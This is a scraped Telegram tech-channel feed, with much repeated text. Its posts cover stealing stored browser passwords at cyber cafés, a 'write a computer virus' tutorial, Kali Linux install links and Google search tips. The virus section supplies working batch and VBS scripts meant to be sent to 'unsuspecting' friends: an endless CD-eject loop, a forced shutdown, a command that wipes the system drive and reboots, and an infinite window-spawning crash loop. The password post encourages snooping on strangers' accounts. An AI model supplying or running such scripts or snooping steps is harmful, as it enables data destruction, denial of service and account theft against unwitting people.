👍Do you like this channel? Share it to your friends.
ℹ️ t.me/TechByte
🌟Rate us » t.me/tchannelsbot?start=TechByte
👣Join us on Facebook: https://fb.me/GEEKernel
👥Join our Telegram group: https://t.me/GEEKernel
Viewing Stored Passwords...
Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted!
Even though we all know it's a bad idea, a lot of people still use their browser's store password function to keep up with all their accounts. While convenient, this shortcut also makes their passwords very easy to find if you have access to the computer they're stored on.
This guide shows you how to view saved passwords in Mozilla Firefox Web Browser
</lesson_001:> ...in Firefox Browser
Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted!
Even though we all know it's a bad idea, a lot of people still use their browser's store password function to keep up with all their accounts. While convenient, this shortcut also makes their passwords very easy to find if you have access to the computer they're stored on.
This guide shows you how to view saved passwords in Mozilla Firefox Web Browser
1⃣Firefox users running Windows, first open the main menu (Firefox) in the upper left-hand corner and select Options. If you're on a Mac, hit Firefox, then Preferences.
@TechByte | @RLchannels
@TechByte | @RLchannels
2⃣Head over to the Security tab and click Saved Passwords... or simply press P
@TechByte | @RLchannels
@TechByte | @RLchannels
3⃣This screen pops up and you can see all the passwords that were used to sign in to a website.
@TechByte | @RLchannels
@TechByte | @RLchannels
Tech Byte™
Viewing Stored Passwords... </lesson_001:> ...in Firefox Browser Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted! Even though…
Remember, this may be considered rude, or creepy and illegal in most places, and if you get caught, you may be fined or punished, but...
...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.
Please consider giving us an honest rating and review: http://t.me/tchannelsbot?start=TechByte
...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.
Please consider giving us an honest rating and review: http://t.me/tchannelsbot?start=TechByte
Writing a Computer Virus
Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some
Most of us are new at coding so I'm just gonna start with the basic simple ones.
All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.
</lesson_001:> ...using Notepad
Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some
Most of us are new at coding so I'm just gonna start with the basic simple ones.
All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.
Tech Byte™
Writing a Computer Virus </lesson_001:> ...using Notepad Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some Most of us are new at coding so I'm just gonna start with the basic simple ones. All you need to have…
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them!
Copy and type this Code in Notepad:
Save it as “FileName.vbs” and send it to an unsuspecting friend.
@TechByte
Copy and type this Code in Notepad:
Set oWMP = CreateObject(“WMPlayer.OCX.”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep5000
loop
Save it as “FileName.vbs” and send it to an unsuspecting friend.
@TechByte
Tech Byte™
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them! Copy and type this Code in Notepad: Set oWMP = CreateObject(“WMPlayer.OCX.”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count>= 1 then For i = 0 to…
2⃣Convey your friend a little message and shut down his / her computer:
Type this code:
Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Type this code:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Tech Byte™
2⃣Convey your friend a little message and shut down his / her computer: Type this code: @echo off msg * I don’t like you shutdown -c “Error! You are too stupid!” -s Save it as FileName.vbs and send it. Make sure they open the file for it to work.
3⃣This virus deletes the Contents of a Drive
Type this in Notepad:
Save the above code as "FileName.bat"
@TechByte | @GEEKernel
Type this in Notepad:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save the above code as "FileName.bat"
@TechByte | @GEEKernel
Tech Byte™
3⃣This virus deletes the Contents of a Drive Type this in Notepad: @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00 Save the above code as "FileName.bat" @TechByte | @GEEKernel
4⃣Open Infinite cmd.exe windows to crash PC
Type this in Notepad.
Save it as FileName.bat
Type this in Notepad.
@echo off
:top
start
goto top
Save it as FileName.bat
Tech Byte™
4⃣Open Infinite cmd.exe windows to crash PC Type this in Notepad. @echo off :top start goto top Save it as FileName.bat
I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.
@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.
:top - This will be our starting point of our loop.
start - This opens one cmd window
goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].
So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.
To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.
:top - This will be our starting point of our loop.
start - This opens one cmd window
goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].
So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.
To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
Install Kali 2.0
Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows
Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows
Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
Tech Byte™
Install Kali 2.0 Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
There's how to install Kali Linux on a Windows PC.
To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.
After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.
@TechByte
To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.
After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.
@TechByte
Kali Linux
Get Kali | Kali Linux
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
@TechByte Kali-Linux-Light-2017-x86.iso
832.7 MB
Kali Linux 2017.1 | 32-bit
Latest Stable Release
Latest Stable Release
Tech Byte™ via @like
Getting the Most out of Google Search
Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?
These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.
@TechByte
</lesson_001.0:> Search Shortcuts
Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?
These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.
@TechByte
1⃣Weather Forecast
Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast
@TechByte
Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast
@TechByte
2⃣Global Time
Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.
@TechByte
Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.
@TechByte
3⃣Calculator
Type any mathematical calculation. You can also search "calculator" and the calculator pops up.
@TechByte
Type any mathematical calculation. You can also search "calculator" and the calculator pops up.
@TechByte
4⃣Instant Dictionary
Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.
@TechByte
Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.
@TechByte